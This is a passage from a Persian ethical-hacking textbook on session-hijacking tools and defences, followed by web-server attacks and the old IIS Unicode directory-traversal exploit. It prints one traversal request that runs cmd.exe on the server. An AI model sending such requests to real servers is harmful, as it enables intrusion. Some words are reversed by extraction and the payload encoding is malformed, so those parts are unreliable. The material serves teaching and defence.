IP Watcher ، اﺑﺰاري ﺗﺠﺎري ﺑﺮاي دزدي ﻧﺸﺴﺖ ( Session hijacking ) اﺳﺖ ﻛﻪ ﺑﻪ ﻫﻜ ﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﺎ ارﺗﺒﺎﻃﺎت را ﻣﺎﻧﻴﺘﻮر ﻛﻨﺪ و آﻧﻬﺎ را ﺑﮕﻴﺮد . اﻳﻦ ﺑﺮﻧﺎﻣﻪ، ﻣﻲ ﺗﻮاﻧﺪ ﺗﻤﺎم ارﺗﺒﺎﻃﺎت روي ﺷﺒﻜﻪ را ﻣﺎﻧﻴﺘﻮر ﻛﻨﺪ، ﺑﻪ ﻫﻜﺮ اﺟﺎزه ﻣﻲ دﻫﺪ ﺗﺎ ﻛﭙﻲ ﻧﺸﺴﺖ را ﺑﺼﻮرت ﻫﻤﺰﻣﺎن ﻣﺸﺎﻫﺪه ﻛﻨﺪ . .

T-Sight ، ﻳﻚ اﺑﺰار ﻣﺎﻧﻴﺘﻮرﻳﻨﮓ و ﮔﺮﻓﺘﻦ ﻧﺸﺴﺖ اﺳﺖ ﻛﻪ در ﻣﺤﻴﻂ ﻫﺎي وﻳﻨﺪوزي اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﺑﺎ اﻳﻦ اﺑﺰار، ﻣﺪﻳﺮان ﺷﺒﻜﻪ ﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﺗﻤﺎم ارﺗﺒﺎﻃﺎت ﺷﺒﻜﻪ را ﺑﺼﻮرت ﺑﻼدرﻧﮓ ﻣﺎﻧﻴﺘﻮر ﻛﻨﻨﺪ و ﻫﺮ ﻓﻌﺎﻟﻴﺖ ﻣﺸﻜﻮﻛﻲ ﻛﻪ رخ ﻣﻲ دﻫﺪ را ﻣﺸﺎﻫﺪه ﻛﻨﺪ . T-Sight ، ﻣﻲ ﺗﻮاﻧﺪ ﻫﺮ ﻧﺸﺴﺘﻲ را روي ﺷﺒﻜﻪ، ﺑﺪزﻧﺪ . .

Remote TCP Session Reset Utility ، ﻧﺸﺴﺖ ﻫﺎي ﻛﻨﻮﻧﻲ TCP و اﻃﻼﻋﺎت ارﺗﺒﺎﻃﺎت از ﻗﺒﻴﻞ آدرس ﻫﺎي IP و ﺷﻤﺎره ﭘﻮرت ﻫﺎ را ﻧﻤﺎﻳﺶ دﻫﺪ . اﻳﻦ اﺑﺰار ﺑﻴﺸﺘﺮ ﺑﻪ ﻣﻨﻈﻮر رﻳﺴﺖ ﻛﺮدن ﻧﺸﺴﺖ ﻫﺎي TCP اﺳﺘﻔﺎده ﻣﻲ ﺷﻮﻧﺪ.

ﺧﻄﺮات session hijacking

TCP session hijacking ، ﺣﻤﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ اﺳﺖ . ﺑﺴﻴﺎري از ﺳﻴﺴﺘﻢ ﻫﺎ ﺑﺮاي اﻳﻦ ﺣﻤﻠﻪ آﺳﻴﺐ ﭘﺬﻳﺮﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ آﻧﻬﺎ ﺑﺮاي ارﺗﺒﺎﻃﺎﺗﺸﺎن، از ﭘﺮوﺗﻜﻞ TCP/IP اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻫﺎي ﺟﺪﻳﺪ، ﺗﻼش ﻣﻲ ﻛﻨﻨﺪ ﺗﺎ آﻧﻬﺎ را از دﺳﺖ Session hijacking اﻣﻦ ﺳﺎزﻧﺪ آﻧﻬﺎ اﻳﻨﻜﺎر را ﺑﺎ اﺳﺘﻔﺎده از ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪه ﻫﺎي اﻋﺪاد ﺗﺼﺎدﻓﻲ ﺑﺮاي ﻣﺤﺎﺳﺒﻪ ISN اﻧﺠﺎم ﻣﻲ دﻫﻨﺪ و ﺣﺪس زدن sequence number را دﺷﻮار ﻣﻲ ﺳﺎزﻧﺪ . ﺑﺎ اﻳﻦ ﺣﺎل، اﮔﺮ ﻫﻜﺮ ﺑﺘﻮاﻧﺪ ﺑﺴﺘﻪ ﻫﺎ را sniff ﻛﻨﺪ، اﻳﻦ ﻣﻌﻴﺎر اﻣﻨﻴﺘﻲ ﻧﻴﺰ ﻣﻮﺛﺮ ﻧﺨﻮاﻫﺪ ﺑﻮد . .

ﻫﻜﺮ ﻗﺎﻧﻮﻧ ﻤﻨﺪ ﺑﺎﻳﺪ ﺑﻨﺎ ﺑﻪ د ﻻﻳﻞ زﻳﺮ از session hijacking آﮔﺎه ﺑﺎﺷﺪ : :

• اﻏﻠﺐ ﻛﺎﻣﭙﻴﻮﺗﺮﻫﺎ، آﺳﻴﺐ ﭘﺬﻳﺮﻧﺪ. • روش ﻫﺎي ﻛﻤﻲ ﺑﺮاي ﻣﺤﺎﻓﻈﺖ از آن وﺟﻮد دارد. • اﻧﺠﺎم ﺣﻤﻼت session hijacking ﺳﺎده اﺳﺖ. • ﺑﻪ ﺧﺎﻃﺮ اﻃﻼﻋﺎﺗﻲ ﻛﻪ ﻣﻲ ﺗﻮاﻧﺪ در ﻃﻮل اﻳﻦ ﺣﻤﻠﻪ ﺟﻤﻊ آوري ﺷﻮﻧﺪ، اﻳﻦ ﺣﻤﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ اﺳﺖ.

140

ﭼﮕﻮﻧﮕﻲ ﭘﻴﺸﮕﻴﺮي از session hijacking

ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از ﺣﻤﻼت session hijacking ، ﺑﺎﻳﺪ ﭼﻨﺪﻳﻦ ﭘﺪاﻓﻨﺪ در ﺷﺒﻜﻪ اﺳﺘﻔﺎده ﺷﻮد . ﻣﻮﺛﺮﺗﺮﻳﻦ روش ﻣﺤﺎﻓﻈﺘﻲ، رﻣﺰﮔﺬاري اﺳﺖ از ﻗﺒﻴﻞ IPSec . ﻫﻤﭽﻨﻴﻦ ﺑﺎ اﻳﻦ روش، ﺟﻠﻮي ﺑﺴﻴﺎري از ﺣﻤﻼﺗﻲ ﻛﻪ ﺑﺮ ﭘﺎﻳﻪ اﺳﺘﺮاق ﺳﻤﻊ ﻫﺴ ﺪﻨﺘ ﻧﻴﺰ ﮔﺮﻓﺘﻪ ﻣﻲ ﺷﻮد . ﻣﻤﻜﻦ اﺳﺖ ﻫﻜﺮﻫﺎ، ﺑﺘﻮاﻧﻨﺪ ﺑﺼﻮرت ﭘﺴﻴﻮ، ارﺗﺒﺎط ﺷﻤﺎ را ﻣﺎﻧﻴﺘﻮر ﻛﻨﻨﺪ اﻣﺎ ﻧﻤﻲ ﺗﻮاﻧﻨﺪ داده ﻫﺎي رﻣﺰ ﺷﺪه را ﺗﻔﺴﻴﺮ و ﺗﺮﺟﻤﻪ ﻛﻨﻨﺪ . روش ﻫﺎي دﻳﮕﺮ ، اﺳﺘﻔﺎده از اﭘﻠﻴﻜﺸﻦ ﻫﺎي رﻣﺰﮔﺬاري ﺷﺪه از ﻗﺒﻴﻞ SSH و SSL اﺳﺖ . .

ﺷﻤﺎ ﻣﻲ ﺗﻮاﻧﻴﺪ ﺑﺎ ﻛﺎﻫﺶ روش ﻫﺎي دﺳﺘﺮﺳﻲ ﺑﻪ ﺷﺒﻜﻪ، از session hijacking ﭘﻴﺸﮕﻴﺮي ﻛﻨﻴﺪ ﺑ ﺮاي ﻣﺜﺎل، ﺑﺎ ﺣﺬف دﺳﺘﺮﺳﻲ راه دور ( remote ) ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎي داﺧﻠﻲ . اﮔﺮ ﺷﺒﻜﻪ داراي ﻛﺎرﺑﺮاﻧﻲ اﺳﺖ ﻛﻪ ﺑﺎﻳﺪ ﺑﺼﻮرت رﻳﻤﻮت ﺑﻪ ﺷﺒﻜﻪ وﺻﻞ ﺷﻮﻧﺪ ﺗﺎ ﺑﻨﻮاﻧﻨﺪ وﻇﺎﻳﻔﺸﺎن را اﻧﺠﺎم دﻫﻨﺪ، از VPN اﺳﺘﻔﺎده ﻛﻨﻴﺪ . .

اﺳﺘﻔﺎده از ﭼﻨﺪﻳﻦ روش اﻣﻦ ﺳﺎزي، ﺑﻬﺘﺮﻳﻦ راه ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻫﺮ ﺗﻬﺪﻳﺪي اﺳﺖ . اﺳﺘﻔﺎده از ﺗﻨﻬﺎ ﻳﻜﻲ از اﻳﻦ روش ﻫﺎ ﻣﻤﻜﻦ اﺳﺖ ﻛﺎﻓﻲ ﻧﺒﺎﺷﺪ اﻣﺎ ﺑﺎ اﺳﺘﻔﺎده از ﻫﻤﮕﻲ آﻧﻬﺎ ﺑﺮاي اﻣﻦ ﺳﺎزي، اﺣﺘﻤﺎل ﻣﻮﻓﻘﻴﺖ ﻫﻜﺮ را ﻛﺎﻫﺶ ﻣﻲ دﻫﺪ . در زﻳﺮ روش ﻫﺎﻳﻲ ﻛﻪ ﺑﺎﻳﺪ ﺑﺮاي ﺟﻠﻮﮔﻴﺮي از Session hijacking اﺳﺘﻔﺎده ﺷﻮد، آورده ﺷﺪه اﺳﺖ : :

• اﺳﺘﻔﺎده از رﻣﺰﮔﺬاري • اﺳﺘﻔﺎده از ﭘﺮوﺗﻜﻞ اﻣﻦ • ﻣﺤﺪود ﻛﺮدن ﺗﻌﺪاد ارﺗﺒﺎﻃﺎت ورودي • ﺑﻪ ﺣﺪاﻗﻞ رﺳﺎﻧﺪن دﺳﺘﺮﺳﻲ راه دور • داﺷﺘﻦ اﺣﺮاز ﻫﻮﻳﺖ ﻗﺪرﺗﻤﻨﺪ • آﻣﻮزش ﻛﺎرﻛﻨﺎن • ﻧﮕﻬﺪاري از ﭼﻨﺪﻳﻦ ﻧﺎم ﻛﺎرﺑﺮي و ﭘﺴﻮرد ﺑﺮاي اﻛﺎﻧﺖ ﻫﺎي ﻣﺨﺘﻠﻒ . .

141

ﻓﺼﻞ ﻫﺸﺘﻢ

ﻫﻚ وب ﺳﺮورﻫﺎ، آﺳﻴﺐ ﭘﺬﻳﺮي ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ

وب ، و ﺗﻜﻨﻴﻚ ﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﻫﺎي ﻣﺒﺘﻨﻲ ﺑﺮ وب

ﻣﻘﺪﻣﻪ

وب ﺳﺮورﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب، ﺑﺴﻴﺎر ﻣﺴﺘﻌﺪ ﺣ ﻪﻠﻤ ﻫﺴﺘﻨﺪ . اوﻟﻴﻦ دﻟﻴﻞ آن، اﻳﻦ اﺳﺖ ﻛﻪ وب ﺳﺮور ﻫﺎ، ﺑﺎﻳﺪ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ دﺳﺘﺮس ﺑﺎﺷﻨﺪ . زﻣﺎﻧﻴﻜﻪ وب ﺳﺮوري ﻣﻮرد ﺣﻤﻠﻪ ﻗﺮار ﮔﺮﻓﺖ، راﻫﻲ را ﺑﺮاي ورود ﻫﻜﺮ ﺑﻪ داﺧﻞ ﺷﺒﻜﻪ ﻓﺮاﻫﻢ ﻣﻲ .دروآ ﻧﻪ ﺗﻨﻬﺎ ﻧﺮم اﻓﺰار وب ﺳﺮور ﺑﻠﻜﻪ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻳﻲ ﻛﻪ ﺑﺮ روي وب ﺳﺮور ﻧﻴﺰ اﺟﺮا ﻣﻲ ﺷﻮﻧﺪ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﺮاي ﺣﻤﻠﻪ اﺳﺘﻔﺎده ﺷﻮﻧﺪ . ﺑﻪ ﺧﺎﻃﺮ ﻋﻤﻠﻜﺮد آﻧﻬﺎ، وب ﺳﺮورﻫﺎ ﻧﺴﺒﺖ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎي دﻳﮕﺮ، ﻗﺎﺑﻞ دﺳﺘﺮس ﺗﺮ ﻫﺴﺘ ﻨﺪ و و ﻨﺪ ﺣﻔﺎﻇﺖ از آﻧﻬﺎ ﻛﻤﺘﺮ اﺳﺖ ﺑﻨﺎﺑﺮاﻳﻦ، ﺣﻤﻠﻪ ﺑﻪ وب ﺳﺮورﻫﺎ ﺑﺴﻴﺎر ﺳﺎده ﺗﺮ اﺳﺖ . .

وب ﺳﺮورﻫﺎ در 24 ﺳﺎﻋﺖ ﺷﺒﺎﻧﻪ روز و 7 روز ﻫﻔﺘﻪ در دﺳﺘﺮس ﻫﺴﺘﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﺣﻤﻠﻪ ﺑﻪ ﺷﺒﻜﻪ را ﺑﺴﻴﺎر راﺣﺖ ﺗﺮ ﻣﻲ ﻨﻛ ﻨﺪ . اﻳﻦ ﻓﺼﻞ در ﻣﻮرد اﻧﻮاع ﺣﻤﻼﺗﻲ ﻛﻪ ﺑﺮ ﻋﻠﻴﻪ وب ﺳﺮورﻫﺎ و ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب اﻧﺠﺎم ﻣﻲ ﮔﻴﺮﻧﺪ، و ﻧﻴﺰ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي آﻧﻬﺎ ﺑﺤﺚ ﻣﻲ ﻛﻨﺪ . .

ﻫﻚ وب ﺳﺮورﻫﺎ

ﺑﻪ ﻋﻨﻮان ﻛﺎرﺷﻨﺎس اﻣﻨﻴﺘﻲ، ﺑﺎﻳﺪ ﺑﺎ ﻧﺤﻮه ﻫﻚ وب ﺳﺮورﻫﺎ ، آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي آﻧﻬﺎ، و ﻧﻴﺰ اﻧﻮاع ﺣﻤﻼﺗﻲ ﻛﻪ ﻫﻜﺮ ﻣﻤﻜﻦ اﺳﺖ اﺳﺘﻔﺎده ﻛﻨﺪ، آﺷﻨﺎ ﺑﺎﺷﻴﺪ . ﻋﻼوه ﺑﺮ اﻳﻦ، ﺑﺎ ﺗﻜﻨﻴﻚﻫ ﺎي ﻣﺪﻳﺮﻳﺖ patch ﻫﺎ و روش ﻫﺎي اﻳﻤﻦ ﺳﺎزي وب ﺳﺮورﻫﺎ ﺰﻴﻧ ﺪﻳﺎﺑ آﺷﻨﺎ ﺑﺎﺷﻴﺪ . .

اﻧﻮاع آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي وب ﺳﺮور

وب ﺳﺮورﻫﺎ ﻧﻴﺰ ﻣﺜﻞ ﺳﻴﺴﺘﻢ ﻫﺎي دﻳﮕﺮ ﻣﻲ ﺗﻮاﻧﻨﺪ ﻣﻮرد ﺣﻤﻠﻪ ﻫﻜﺮ ﻗﺮار ﮔﻴﺮﻧﺪ . ﺑﺮﺧﻲ از ﻣﻬﻢ ﺗﺮﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي وب ﺳﺮورﻫﺎ ﻋﺒﺎرﺗﻨﺪ از : :

• ﭘﻴﻜﺮﺑﻨﺪي ﻧﺎدرﺳﺖ ﻧﺮم اﻓﺰار وب ﺳﺮور ( Apache ، IIS و ...)

143

• ﻣﺸﻜﻼت ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﺎ ﻧﺮم اﻓﺰار ﻫﺎ ﻳﺎ ﺧ ﺎﻄ در ﻛﺪ ﺑﺮﻧﺎﻣﻪ • آﺳﻴﺐ ﭘﺬﻳﺮ ﺑﻮدن ﻧﺼﺐ ﻫﺎي ﭘﻴﺶ ﻓﺮض ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﺎ ﻧﺮم اﻓﺰار وب ﺳﺮور، و ﻋﺪم ﺑﻪ روز رﺳﺎﻧﻲ آﻧﻬﺎ • ﻧﺪاﺷﺘﻦ ﻓﺮآﻳﻨﺪﻫﺎ و ﺳﻴﺎﺳﺖ ﻫﺎي اﻣﻨﻴﺘﻲ ﺻﺤﻴﺢ

ﻫﻜﺮﻫﺎ از اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ ﺑﺮاي اﻳﺠﺎد دﺳﺘﺮﺳﻲ ﺑﻪ وب ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . از آﻧﺠﺎﺋﻴﻜﻪ وب ﺳﺮورﻫﺎ در DMZ ﻗﺮار ﮔﺮﻓﺘﻪ اﻧﺪ، و از ﻃﺮﻳﻖ ﺳﻴﺴﺘﻢ ﻫﺎي داﺧﻞ ﺳﺎزﻣﺎن ﺑﻪ راﺣﺘﻲ ﻗﺎﺑﻞ دﺳﺘﺮس ﻫﺴﺘﻨﺪ، وﺟﻮد ﺿﻌﻔﻲ در ﻳﻚ وب ﺳﺮور، دﺳﺘﺮﺳﻲ ﻫﻜﺮ ﺑﻪ ﺳﻴﺴﺘﻢ ﻫﺎ و ﭘﺎﻳﮕﺎه داده ﻫﺎي داﺧﻠﻲ را ﺳﺎده ﺗﺮ ﻣﻲ ﻛﻨﺪ . .

ﺣﻤﻼت ﺑﻪ وب ﺳﺮورﻫﺎ

آﺷﻜﺎرﺗﺮﻳﻦ ﺣﻤﻠﻪ ﺑﺮ ﻋﻠﻴﻪ وب ﺳﺮورﻫﺎ، defacement ( ﺗﻐﻴﻴﺮ ﺻﻔﺤﻪ وب ﺳﺎﻳﺖ ) اﺳﺖ . ﻫﻜﺮﻫﺎ، ﺻﻔﺤﺎت وب را ﺻﺮﻓﺎ ﺑﻪ ﺧﺎﻃﺮ ﻟﺬت ﻳﺎ ﻣﻌﺮوف ﺷﺪن، deface ﻣﻲ ﻛﻨﻨﺪ . Deface ﻛﺮدن ﺻﻔﺤﻪ وب، ﻳﻌﻨﻲ اﻳﻨﻜﻪ ﻫﻜﺮ از آﺳﻴﺐ ﭘﺬﻳﺮي ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﺎ ﻧﺮم اﻓﺰار وب ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﺳﭙﺲ ﻓﺎﻳﻞ ﻫﺎي وب ﺳﺎﻳﺖ را ﺗﻐﻴﻴﺮ ﻣﻲ دﻫﺪ ﺗﺎ ﻧﺸﺎن دﻫﺪ ﺳﺎﻳﺖ ﻫﻚ ﺷﺪه اﺳﺖ . ﻣﻌﻤﻮﻻ ﻫﻜﺮ، ﻧﺎم ﺧﻮد را در ﺻﻔﺤﻪ اول ﺳﺎﻳﺖ ﻗﺮار ﻣﻲ دﻫﺪ . .

راﻳﺞ ﺗﺮﻳﻦ ﺣﻤﻼت وب ﺳﺎﻳﺖ ﻛﻪ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻃ ﺮﻳﻖ آﻧﻬﺎ وب ﺳﺎﻳﺘﻲ را deface ﻛﻨﺪ ﻋﺒﺎرﺗﻨﺪ از : :

• ﺑﻪ دﺳﺖ آوردن اﻋﺘﺒﺎر administrator از ﻃﺮﻳﻖ ﺣﻤﻼت man-in-the-middle • ﻛﺸﻒ ﭘﺴﻮرد administrator از ﻃﺮﻳﻖ ﺣﻤﻠﻪ brute-force • اﺳﺘﻔﺎده از ﺣﻤﻠﻪ DNS ﺑﺮاي ﻫﺪاﻳﺖ ﻛﺎرﺑﺮ ﺑﻪ وب ﺳﺮور دﻳﮕﺮ • ﺣﻤﻠﻪ ﺑﻪ ﺳﺮور FTP ﻳﺎ e-mail • اﺳﺘﻔﺎده ا ز ﻣﺸﻜﻼت ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﺤﺖ وب ﻛﻪ ﺳﺒﺐ آﺳﻴﺐ ﭘﺬﻳﺮي آﻧﻬﺎ ﻣﻲ ﺷﻮد • ﭘﻴﻜﺮﺑﻨﺪي ﻧﺎدرﺳﺖ ﻣﻨﺎﺑﻊ ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ ﺷﺪه در ﺷﺒﻜﻪ • ﺳﻮاﺳﺘﻔﺎده از ﺿﻌﻒ ﻫﺎي ﻣﺠﻮز دﻫﻲ ( permission) • ﻣﺴﻴﺮدﻫﻲ ﻣﺠﺪد ﻛﻼﻳﻨﺖ ﻫﺎ ﭘﺲ از ﺣﻤﻠﻪ ﺑﻪ ﻓﺎﻳﺮوال ﻳﺎ روﺗﺮ • اﺳﺘﻔﺎده از ﺣﻤﻼت SQL injection ( اﮔﺮ ﺳﺮور SQL و وب ﺳﺮور ﻳﻜﻲ ﻫﺴﺘﻨﺪ) • ﻧﻔﻮذ از ﻃﺮﻳﻖ Telnet ﻳﺎ SSH • اﻧﺠﺎم URL poisoning ﻛﻪ ﻛﺎرﺑﺮ را ﺑﻪ آدرس اﻳﻨﺘﺮﻧﺘﻲ دﻳﮕﺮي ﻫﺪاﻳﺖ ﻣﻲ ﻛﻨﺪ • اﺳﺘﻔﺎده از extension ﺎﻫ ي وب ﺳﺮور ﻳﺎ ﻧﻔﻮذ از ﻃﺮﻳﻖ ﺳﺮوﻳﺲ رﻳﻤﻮت

144

IIS Unicode Exploit

ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوز 2000 ﻛﻪ ﺑﺮ روي آﻧﻬﺎ IIS ﻧﺼﺐ ﻫﺴﺘﻨﺪ، ﺑﺴﻴﺎر ﻣﺴﺘﻌﺪ ﺣﻤﻠﻪ directory traversal ﻛﻪ ﺑﻪ ﻋﻨﻮان Unicode exploit ﻫﻢ ﺷﻨﺎﺧﺘﻪ ﻣﻲ ﺷﻮد ﻫﺴﺘﻨﺪ . آﺳﻴﺐ ﭘﺬﻳﺮي ﻣﻮﺟﻮد در IIS ، اﺟﺎزه directory traversal/Unicode exploit را ﺗﻨﻬﺎ در ﺳﻴﺴﺘﻢ ﻫﺎي وﻳﻨﺪوز 2000 ﻛﻪ patch ﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮ روي آﻧﻬﺎ ﻧﺼﺐ ﻧﻴﺴﺘﻨﺪ را ﻣﻲ دﻫﺪ و ﺑﺮ روي اﺳﻜﺮﻳﭙﺖ ﻫﺎي CGI و ﺗﻮﺳﻌﻪ ﻫﺎي ISAPI ﻫﻤﭽﻮن ASP ﺗﺎﺛﻴﺮﮔﺬار ﻫﺴﺘﻨﺪ . اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﺑﻪ دﻟﻴﻞ ﺗﺮﺟﻤﻪ ( ﺗﻔﺴﻴﺮ ) ﻧﺎدرﺳﺖ ﻳﻮﻧﻴﻜﺪ ﺗﻮﺳﻂ IIS parser رخ ﻣﻲ دﻫﺪ و اﺟﺎزه دﺳﺘﺮﺳﻲ ﻫﻜﺮ را ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲ دﻫﺪ . .

ﻳﻮﻧﻴﻜﺪ، ﻛﺎراﻛﺘﺮﻫﺎي ﻫﺮ زﺑﺎﻧﻲ را ﺑﻪ ﻛﺪﻫﺎي ﻣﺸﺨﺺ ﺟﻬﺎﻧﻲ ( universal ) ﺗﺒﺪﻳﻞ ﻣﻲ ﻛﻨﺪ . ﻫﺮ ﭼﻨﺪ ﻛﻪ ﻳﻮﻧﻴﻜﺪ، دو ﺑﺎر ﺗﺮﺟﻤﻪ ﻣﻲ ﺷﻮد وﻟﻲ ﭘﺎر ﺳﺮ، ﺗﻨﻬﺎ ﻳﻜﺒﺎر درﺧﻮاﺳﺖ ﻧﺘﺎﻳﺞ را اﺳﻜﻦ ﻣﻲ ﻛﻨﺪ . ﺑﻨﺎﺑﺮاﻳﻦ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ IIS ، درﺧﻮاﺳﺖﻫ ﺎي ﻓﺎﻳﻞ را ﻣﺨﻔﻲ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل ، از c0% af% ﺑﻪ ﺟﺎي ﻳﻚ اﺳﻠﺶ در ﻳﻚ ﻧﺎم ﻣﺴﻴﺮ اﺳﺘﻔﺎده ﻛﻨﺪ ﺗﺎ از آﺳﻴﺐ ﭘﺬﻳﺮي IIS اﺳﺘﻔﺎده ﻛﻨﺪ . ﻛﺎراﻛﺘﺮﻫﺎي ASCII ﺑﺮاي ﻧﻘﻄﻪ ﻫﺎ ﺑﺎ ﻳﻮﻧﻴﻜﺪ " 2E%" ﺑﺮاي اﺳﻠﺶ ﻫﺎ ﺑﺎ " co%af%" ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲ ﺷﻮد . ﺑﺮاي ﻣﺜﺎل ﺑﺎ ﺗﻐﺬﻳﻪ درﺧﻮاﺳﺖ HTTP ﺑﻪ IIS ، دﺳﺘﻮرات ﻣﻮرد دﻟﺨﻮاه ﺑﺮ روي ﺳﺮور اﺟﺮا ﻣﻲ ﺷﻮد : :

GET/scripts/..%c%af../winnt/system32/cmd.exe?/c+dir=c:\ HTTP/1.0

در ﺑﻌﻀﻲ از ﻣﻮارد، درﺧﻮاﺳﺖ، اﺟﺎزه دﺳﺘﺮﺳﻲ ﻫﻜﺮ ﺑﻪ ﻓﺎﻳﻞ ﻫﺎ ي را ﻣﻲ دﻫﺪ ﻛﻪ ﻧﺒﺎﻳﺪ ﺑﺒﻴﻨ .ﺪ آﺳﻴﺐ ﭘﺬﻳﺮي Unicode Directory Traversal ، در IIS ﻫﺎي ورژن 4 5و وﺟﻮد دارد ﻛﻪ ﺑﺎ اﺳﺘﻔﺎده از ﻳﻚ آدرس URL ﻧﺎدرﺳﺖ، ﻣﻲ ﺗﻮان ﺑﻪ ﻓﺎﻳﻞ ﻫﺎ و ﻓﻮﻟﺪرﻫﺎﻳﻲ ﻛﻪ در ﻓﻮﻟﺪرﻫﺎي وب وﺟﻮد دارﻧﺪ، دﺳﺘﺮﺳﻲ ﭘﻴﺪا ﻛﺮد و اﺟﺎزه اﻓﺰاﻳﺶ ﺳﻄﺢ دﺳﺘﺮﺳﻲ ، ، اﺿﺎﻓﻪ ﻛﺮدن، ﺗﻐﻴﻴﺮ دادن، ﻳﺎ ﺣﺬف ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ ﻳﺎ آﭘﻠﻮد ﻛﺮدن و اﺟﺮاي ﻛﺪ روي ﺳﺮور ، و ﺰﻴﻧ اﺿ ﺎﻓﻪ ﻳﺎ اﺟﺮا ﻛﺮدن ﻓﺎﻳﻞ ﻫﺎ ﺑﺮ روي ﺳﻴﺴﺘﻢ را ﺑﻪ ﻫﻜﺮ ﻣﻲ دﻫﺪ ﺗﺎ ﺗﺮوﺟﺎن ﻳﺎ backdoor را روي ﺳﻴﺴﺘﻢ ﻧﺼﺐ ﻛﻨﺪ . .

IIS Unicode exploit ، آﺳﻴﺐ ﭘﺬﻳﺮي ﻗﺪﻳﻤﻲ اﺳﺖ و در اﻳﻨﺠﺎ ﺗﻨﻬﺎ ﺑﺮاي ﺑﻴﺎن ﻣﻔﻬﻮم و اﺛﺒﺎت آﺳﻴﺐ ﭘﺬﻳﺮي

آن و اﺣﺘﻤﺎل اﺳﺘﻔﺎده از آن، آورد ه ﺷﺪه اﺳﺖ . .

145

اﺑﺰارﻫﺎي ﻫﻚ N-Stalker Web Application Security Scanner ، اﺟﺎزه ارزﻳﺎﺑﻲ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺗﺤﺖ وب را ﺑﺮاي ﺗﻌﺪاد زﻳﺎدي از آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ از ﻗﺒﻴﻞ ﺣﻤﻼت buffer overflow ، SQL injection ، cross-site scripting ، و -parameter tampering را ﻣﻲ دﻫﺪ . .

Metasploit framework ، اﺑﺰاري راﻳﮕﺎن ﺑﺮاي ﺗ ﺴﺖ ﻳﺎ ﻫﻚ ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ ﻳﺎ ﻧﺮم اﻓﺰار وب ﺳﺮور اﺳﺖ . ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻫﺎ، ﻣﻲ ﺗﻮاﻧﻨﺪ ﺑﻪ ﻋﻨﻮان ﻼﭘ ﻴﮔ ﻦ ﻫﺎ اﺳﺘﻔﺎده ﺷﻮﻧﺪ و ﺗﺴﺖ ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ وﻳﻨﺪوز ﻳﺎ ﻳﻮﻧﻴﻜﺲ اﻧﺠﺎم ﺷﻮد . ﻳﻮﻠﭙﺳاﺎﺘﻣ ﺖ ، اﺑﺘﺪا ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺧﻂ دﺳﺘﻮري ﺑﻮد ﻲﻟو اﻛﻨﻮن داراي ﻴﻓﺮﺘﻨﻳا ﺲ وب اﺳﺖ . ﺑﺎ اﺳﺘﻔﺎده از ﻳﻮﻠﭙﺳاﺎﺘﻣ ﺖ ، ﻫﻜﺮﻫﺎ ﻣﻲ ﺗﻮاﻧﻨﺪ ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻫﺎي ﺧﻮدﺷﺎن را ﺑﻨﻮﻳﺴﻨﺪ . .

IISxploit.exe ، اﺑﺰاري ﺑﺮاي ﺧﻮدﻛﺎر ﻛﺮدن directory traversal exploit در IIS اﺳﺖ ﻛﻪ ﺑﺮاي ﻛا ﺴ ﻳﻮﻠﭙ ﺖ ﻛﺮدن از Unicode string اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

